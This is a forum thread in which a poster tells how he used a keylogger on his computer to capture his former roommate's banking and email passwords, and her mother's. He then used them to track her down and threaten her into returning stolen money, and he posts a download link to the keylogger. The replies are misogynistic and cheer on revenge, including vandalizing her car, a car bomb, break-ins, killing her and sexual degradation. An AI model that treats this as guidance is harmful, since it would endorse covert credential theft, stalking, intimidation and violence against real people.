Page 1 of 2 12 LastLast
    Deezuhl is offline Anabolic Member

My roomate tried to jack me for 6 g's......

Some of you may remember the the chunky bitch i posted up pics of here that i was banging for a while that was my roomate. Well when i got on cycle i quit banging her and actually starting dating someone. She was beyond pissed off even though she was just someone i banged i not my girlfriend. she told me we could still bone even though i had a girl and i told her no sorry. well she tried to get even and moved all her shit out one day when i came home from work and vanished without a trace. turned her cell phone off and changed the #, then i look in my sock drawer and i am missing 6,000.00 dollars. I am like there is no way she jacked me for that $$$. well a liuttle program called ghost keylogger saved me 6k to make a long story short. This program i had on my pc she used logs every key stroke. I got her banking info, her email passwords, her moms email passwords, her contact list and started hunting her down thru emailing people she knew. well to make a long 5 day story short I threatened her til no end and dug up so much info thru this program she thought i had the fbi working on the case. She gave me the address of where the $$$ was at her grandmothers and I went there and picked it up. if it wasnt for this program i would have not even had 1 lead on where to go to find her. here is a link to download the program too. i put on my server so dont send it out to too many people cause it costs $$$ for bandwith.

http://www.mikesmpegs.com/Software/Ghost%20Keylogger%20V3.40%20(Key%20Logger).zip]Keylogger
    Last edited by Fat Mike; 05-13-2005 at 08:32 AM.

SwoleCat is offline AR Hall of Fame
    Moral of the story:

NEVER BANG FAT BITCHES.

~SC~

Slick Arrado is offline Member
    Good to hear and thanks for the link.

Syndicate is offline Associate Member
    LOL, agreed!

Quote Originally Posted by SwoleCat
    Moral of the story:

NEVER BANG FAT BITCHES.

~SC~
    i said chunky......

ok shit was bit piggy...

511220 is offline Associate Member
    Moral of the story:

NEVER BANG FAT BITCHES.

~SC~

taiboxa is offline "Vanity Redefined" ~VET~
    i saw the pics dood... and obvisouly she felt she was too good for you and you shoulda been paying her for all her sexual fav's which totald up to about ... 6g so in here eyes it was only fair... Fat prostitutes are expensive eh?

F'n brilliant with the prog though.. absolutly brilliant... so .. is your new chick gonna move in w/ you?!

Quote Originally Posted by taiboxa
    F'n brilliant with the prog though.. absolutly brilliant... so .. is your new chick gonna move in w/ you?!
    unfortunately not....

however my boss told me the same thing you said.. he says look at it like this.. " how many times you bang her"? i said maybe 50-60 times. he said " well a hooker is atleats 100.00 so just write it off as hoooker payments".

thats when i got really mad and realized that whore now owes me 12k dollars cause she should have been paying me to bang her!!!

Quote Originally Posted by Fat Mike
    unfortunately not....

however my boss told me the same thing you said.. he says look at it like this.. " how many times you bang her"? i said maybe 50-60 times. he said " well a hooker is atleats 100.00 so just write it off as hoooker payments".

thats when i got really mad and realized that whore now owes me 12k dollars cause she should have been paying me to bang her!!!
    ROFL yes that BITCH!

HeavyHitter is offline Anabolic Member
    Holy $hit bro...... thats pretty insane. I know you got your money back and in the clear with everything (god bless) but, the pride/priciple factor comes to play. That b1tch stole 6g's from you. You have to get her back man!!! Atleast somehow where she doesnt know its you so you dont start a war! She is way to crazy to go face to face with but some sugar in her oil tank, is a nice lil safe way for revenge!! (or something to that effect) hahahahaha

great story!!

Quote Originally Posted by HeavyHitter
    Holy $hit bro...... thats pretty insane. I know you got your money back and in the clear with everything (god bless) but, the pride/priciple factor comes to play. That b1tch stole 6g's from you. You have to get her back man!!! Atleast somehow where she doesnt know its you so you dont start a war! She is way to crazy to go face to face with but some sugar in her oil tank, is a nice lil safe way for revenge!! (or something to that effect) hahahahaha

great story!!
    sugar in gas tank is all fine and dandy but i have found a car bomb to work so much more effectively....

great story!!

thought about It but i have no idea where she lives now and she is in wisconsin right now and probably moving there. her mom and day pay all her bills cause she is in school so it would only cost them the deductible. I think it was enough that i just shook her down so hard sopranos style and recovered my $$ in 5 days. That feeling was good enough and i feel like i hit the lotto for 6 g's cause i didnt think it was ever coming back.

By the way this post # 1000 for me finally. 1yr on here. I have read probably 50k posts honestly but i dont post much. I like to use the search button unlike most of the people on here!!!

thought about It but i have no idea where she lives now and she is in wisconsin right now and probably moving there. her mom and day pay all her bills cause she is in school so it would only cost them the deductible. I think it was enough that i just shook her down so hard sopranos style and recovered my $$ in 5 days. That feeling was good enough and i feel like i hit the lotto for 6 g's cause i didnt think it was ever coming back.

By the way this post # 1000 for me finally. 1yr on here. I have read probably 50k posts honestly but i dont post much. I like to use the search button unlike most of the people on here!!!
    i hear ya bro!! maybe you'll get lucky and run into her in the future. Thats just a great fcking story man!! I was robbed close to 10gs once and never got it back, so im kinda feeling really happy vicariously through you!!! thanks hahahaha

congrats on the G!!!

sugar in gas tank is all fine and dandy but i have found a car bomb to work so much more effectively....

someone got me with that before but i think they used a 2l coke cause there was brown residue on my gas cap and i tasted it and it was sweet. so either brown sugar or coke. needless to say my truck made it out the front gate and shut off on me. cost me 38.00 for 2 fuel filters. no biggie. I told everyone i knew it cost me 1000's to repair cause I didnt know who did it and if they found out it was 38.00 to fix they would do worse. never had further issues.

I usually sit down the street in a bush with my bb gun and 1000 bb's and pop the car over and over and over again. new window, new 1/4 panels, new hubcaps. i even got the tires b4 using sharpened pellets. 4 flats suck.... cant even drive it to get new tires..

*Narkissos* is offline Anabolic Member

Priceless!!!!

i hear ya bro!! maybe you'll get lucky and run into her in the future. Thats just a great fcking story man!! I was robbed close to 10gs once and never got it back, so im kinda feeling really happy vicariously through you!!! thanks hahahaha

congrats on the G!!!
    my buddy got hit for 15k cash too. he was young 16-19yo and worked on cars in his garage at home and stashed the cash to one day open a shop. he never saw it again and narrowed it down to 3 people who call could have even been in on it together. its a terrible feeling...

needless to say the kid opened a shop working on cars with 1 bay and 4 jackstands and he now makes 100k+ a yr easy and is the largest vw/audi/porsche chip distributor in FL.

I usually sit down the street in a bush with my bb gun and 1000 bb's and pop the car over and over and over again. new window, new 1/4 panels, new hubcaps. i even got the tires b4 using sharpened pellets. 4 flats suck.... cant even drive it to get new tires..
    y'all be some evil mofos lol..

alphaman is offline Member
    Post another pic or the link, so we can see if she was worth the risk.

i would a hit it. not wife it tho!! hahahaha fcking kunt.

Would you hit her if you caught her/saw her again?? i might have to make it a first for me...

You should grudefuk her azz. I would.

i would a hit it. not wife it tho!! hahahaha fcking kunt.

Would you hit her if you caught her/saw her again?? i might have to make it a first for me...

I told her actually now thats its all over I want to bang her again just for the thrill factor maybe. Just cause she had the balls to try to pull that shit off. she had a great plan, well thought out , a clean getway and i mean real clean. I just got lucky really by putting that program on my pc 3-4 days earlier. I would have never ever found her w/o it.

was she good in bed and give ample head?

was she good in bed and give ample head?
    she was pretty good for having only been with 1 other guy. she has nice lips and a tongue ring so she gave good head and she took it in the can. The main reason i used bang her was to leave a deposit in the back door.

Moral of the story:

NEVER BANG FAT BITCHES.

~SC~

lmfao!!!

no but for real u need to slap that fat bitch a few times if she jacked ur money

Prime is offline Naturally perfect
    shes quite tasty and hardly fat!

Quote Originally Posted by Prime
    shes quite tasty and hardly fat!
    so funny you say that and i noticed you are from england. the last time i posted up all her pics the guys from europe went crazy. I told her since she is striking out here she might want to give europe a shot cause you guys love her.

I just want to give her the R. kelly shower... .. tell her i am going to come on her face and piss on her.

damn now that i actually scrolled up and saw her pics, she aint that bad...and not fat either...but u still reserve the right to f*ck her up

Prime is offline Naturally perfect
    Yeah my mate went to the states and was amazed at how slim and in shape the girls were. Over here most of the girls are size 12-14 and over. It sucks!

Quote Originally Posted by jollygreenGIANT
    damn now that i actually scrolled up and saw her pics, she aint that bad...and not fat either...but u still reserve the right to f*ck her up

the shirt covers up the belly and her legs are pretty thick too. she is 23% bf i made her get measured cause i thought she was over 30%.

here is a better pic of the hammy....

ReX357 is offline "Toughest & Best Looking Guy Around Here"
    Kill her and hide the body.

Good luck.

she weighs more than lacy when she was pregnant probably. i dont think i could throw her fat ass overboard. I dont "deadlift" that much....

so funny you say that and i noticed you are from england. the last time i posted up all her pics the guys from europe went crazy. I told her since she is striking out here she might want to give europe a shot cause you guys love her.

I just want to give her the R. kelly shower... .. tell her i am going to come on her face and piss on her.
    thats the best idea yet.... totally degrade her. pee on her, bust on her face and then rudely kick her the fck out!!! if she has only been w/ one guy, it would really get to her!! GOOD LUCK!!

pures truly take it to heart the first time there used or degraded!!!

SwoleCat is offline AR Hall of Fame
    she has nice lips and a tongue ring so she gave good head and she took it in the can. The main reason i used bang her was to leave a deposit in the back door.
    Women:

Now you know what guys really discuss in the locker room.

Do you REALLY know YOUR boyfriend?

~SC~

Dally is offline The Dally Lama
    you called her a Hammy.

hahaha

thats a funny one, I've used it a few times.

~SC~

OSTIE is offline Senior Member
    thought about It but i have no idea where she lives now and she is in wisconsin right now and probably moving there

Dude, I live in milw... find out if she lives anywhere close or what college she is goin too... Ill get revenge for you, lol.... I start by breakin in her house and giving every toilet she has, the "upperdecker".... where you sh!t in the top part so everytime you flush, its replaced with the nasty sh!t water....

But seriously, props to you for gettin the money back, i know how much it can suck.... last summer me and my guy threw a party at his parents house.... someone stole 2500$ he had to help pay for his first years tuition of college... We narrowed down whole stole it... I had a good idea who it was, so I talked to the drug dealers in the area to see if anyone bought a large quantity of yayo... sure enough, we got the name we were lookin for.... From there my friend did some ****ed up sh!t to get him back because he knew there was no way of gettin the money back

Dally is offline The Dally Lama
    Quote Originally Posted by OSTIE
    Dude, I live in milw... find out if she lives anywhere close or what college she is goin too... Ill get revenge for you, lol.... I start by breakin in her house and giving every toilet she has, the "upperdecker".... where you sh!t in the top part so everytime you flush, its replaced with the nasty sh!t water....

But seriously, props to you for gettin the money back, i know how much it can suck.... last summer me and my guy threw a party at his parents house.... someone stole 2500$ he had to help pay for his first years tuition of college... We narrowed down whole stole it... I had a good idea who it was, so I talked to the drug dealers in the area to see if anyone bought a large quantity of yayo... sure enough, we got the name we were lookin for.... From there my friend did some ****ed up sh!t to get him back because he knew there was no way of gettin the money back

REDRUM

You should squeeze out a cleavland steamer on her chest.

Page 1 of 2 12 LastLast

Thread Information